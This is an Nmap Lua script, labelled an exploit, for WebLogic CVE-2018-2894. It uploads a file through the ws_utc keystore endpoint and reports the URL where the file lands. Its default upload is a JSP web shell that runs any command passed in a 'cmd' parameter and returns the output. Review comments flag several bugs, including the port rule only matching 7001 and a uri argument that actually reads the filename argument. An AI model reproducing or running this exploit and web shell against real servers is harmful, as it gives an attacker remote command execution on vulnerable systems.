local http = require "http"
local nmap = require "nmap"
local stdnse = require "stdnse"
description = [[
Weblogic CVE-2018-2894
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -n -p 443 --script weblogic-cve-2018-2894.nse victim_host
]]
---
-- @usage
-- nmap -sV --script weblogic-cve-2018-2894 <target> -p 7001
-- nmap -sV --script weblogic-cve-2018-2894
--   --script-args 'weblogic-cve-2018-2894.uri=/,weblogic-cve-2018-2894.filename=test.jsp,weblogic-cve-2018-2894.content=test' <target> -p 7001
--
-- @output
-- PORT     STATE SERVICE
-- 7001/tcp open  afs3-callback
-- | weblogic-upload:
-- |_  url: /ws_utc/config/keystore/1532325925_Nmap.jsp
-- MAC Address: 02:42:AC:13:00:02 (Unknown)
--
-- @args weblogic-cve-2018-2894.uri base path that the ws_utc endpoints are
--       appended to without a separator, so it must end with "/". Default "/"
-- @args weblogic-cve-2018-2894.filename name of the file to be uploaded; the
--       reported path prefixes it with the current os.time(). Default "test.jsp"
-- @args weblogic-cve-2018-2894.content file's contents
--
-- Other useful arguments when using this script are:
-- * http.useragent = String - User Agent used in HTTP requests
--
-- NOTE(review): the port rule below only matches port 7001, so a scan limited
-- to "-p 443" as in the description text above will never run this script.

author = "Rvn0xsy <payloads@aliyun.com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit"}
--- Port rule: the script is scheduled only for port 7001 (the port the
-- usage examples target). Only the numeric port is consulted; the service
-- name, protocol and state are ignored.
-- @param host Nmap host table (unused)
-- @param port Nmap port table; only `port.number` is read
-- @return boolean
function portrule(host, port)
  return port.number == 7001
end
--- Render every entry of `form` as a multipart/form-data text part.
-- Each part is terminated by "--<boundary>\r\n" so that the next part (or
-- the closing delimiter) can be appended directly. Parts are emitted in
-- pairs() order, which is unspecified.
-- @param form table of field name -> value
-- @param boundary multipart boundary string (without the leading "--")
-- @return string beginning with "\r\n" followed by the rendered parts
function add_formData(form, boundary)
  local part_fmt = "Content-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n--%s\r\n"
  local parts = { "\r\n" }
  for field, val in pairs(form) do
    parts[#parts + 1] = string.format(part_fmt, field, val, boundary)
  end
  -- The closing "--" after the last boundary is intentionally not emitted
  -- here; the caller appends further parts.
  return table.concat(parts)
end
--- Render the part header for a file field followed by the closing
-- multipart delimiter "--<boundary>--\r\n".
-- Only `file.name` and `file.filename` are read; the Content-Type is
-- always "text/plain".
-- @param file table with `name` (field name) and `filename` entries
-- @param boundary multipart boundary string (without the leading "--")
-- @return string
function add_fileData(file, boundary)
  local header = string.format(
    "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n",
    file.name, file.filename)
  local closing = string.format("--%s--\r\n", boundary)
  return header .. "Content-Type: text/plain\r\n\r\n" .. closing
end
--- Script action: sends a single multipart/form-data POST to the WS-UTC
-- keystore settings endpoint and, if the server answers HTTP 200, reports
-- the path under which the uploaded file name would be exposed.
-- Detection note: the request path `ws_utc/resources/setting/keystore`
-- with a multipart body, and the derived `ws_utc/config/keystore/<time>_<name>`
-- path, are the artefacts this probe produces on the wire.
-- @param host Nmap host table
-- @param port Nmap port table
-- @return table with field `url` on HTTP 200, otherwise false
action = function(host,port)
  -- NOTE(review): every variable in this function is assigned without
  -- `local`, so all of them leak into the script environment (luacheck
  -- would flag each one).
  form = {}
  file = {}
  shell = {}
  -- Fixed form fields sent with the keystore request; the two password
  -- values are placeholders, not credentials for anything.
  form["ks_name"] = "Exploit CVE-2018-2894"
  form["ks_edit_mode"] = "false"
  form["ks_password_front"] = "123456"
  form["ks_password"] = "123456"
  form["ks_password_changed"] = "true"
  -- Multipart field name of the file part.
  file["name"]="ks_filename"
  -- Upload file name and contents, each taken from a script arg with a default.
  file["filename"] = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "test.jsp"
  file["content"] = stdnse.get_script_args('weblogic-cve-2018-2894.content') or "<%@ page import=\"java.io.*\" %><%try {String cmd = request.getParameter(\"cmd\");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();}catch (InterruptedException e) {e.printStackTrace();}}catch (IOException e) {System.err.println(e);}%>"
  -- Timestamp used as the prefix of the reported file name.
  time = os.time()
  -- NOTE(review): this reads the `.filename` script arg, not `.uri`, so the
  -- `uri` argument documented in the script header is never consulted here;
  -- when `.filename` is given, `uri` becomes that file name.
  uri = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "/"
  -- Fixed multipart boundary.
  boundary = "-ABC"
  -- Assigned but not referenced again in this function.
  ks_name = "Exploit CVE-2018-2894"
  filename = time.."_"..file["filename"]
  -- `uri` is concatenated without a separator, so it is expected to end in
  -- "/". os.time() is evaluated a second time here and may differ from `time`.
  post_url = uri .. "ws_utc/resources/setting/keystore?timestamp="..os.time()
  options = {}
  options.header = {}
  -- Body: opening delimiter, then the form parts, then the file part (which
  -- also carries the closing delimiter). See add_formData / add_fileData.
  options.content = "\r\n--"..boundary
  options.header['Content-Type'] = "multipart/form-data; boundary="..boundary
  options.content = options.content .. add_formData(form,boundary)
  options.content = options.content .. add_fileData(file,boundary)
  -- http.post(host, port, path, options, cookies, postdata); cookies and
  -- postdata are passed as nil, the body travels in options.content.
  resp = http.post(host,port,post_url,options,nil,nil)
  -- Success is inferred from the status code alone; the response body is
  -- not inspected, and the reported URL is built locally from the same
  -- inputs rather than taken from the server's reply.
  if(resp.status == 200)then
    shell["url"] = uri .. "ws_utc/config/keystore/"..filename
    return shell
  end
  return false
end